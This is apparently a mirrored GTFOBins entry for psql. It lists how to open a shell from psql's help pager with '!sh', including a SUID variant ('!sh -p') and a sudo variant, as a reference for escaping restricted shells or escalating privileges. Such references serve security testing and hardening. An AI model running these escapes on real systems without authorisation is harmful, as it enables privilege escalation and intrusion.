mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-26 14:59:44 +01:00
19 lines
197 B
Markdown
19 lines
197 B
Markdown
---
|
|
functions:
|
|
shell:
|
|
- code: |
|
|
psql
|
|
\?
|
|
!sh
|
|
suid:
|
|
- code: |
|
|
psql
|
|
\?
|
|
!sh -p
|
|
sudo:
|
|
- code: |
|
|
psql
|
|
\?
|
|
!sh
|
|
---
|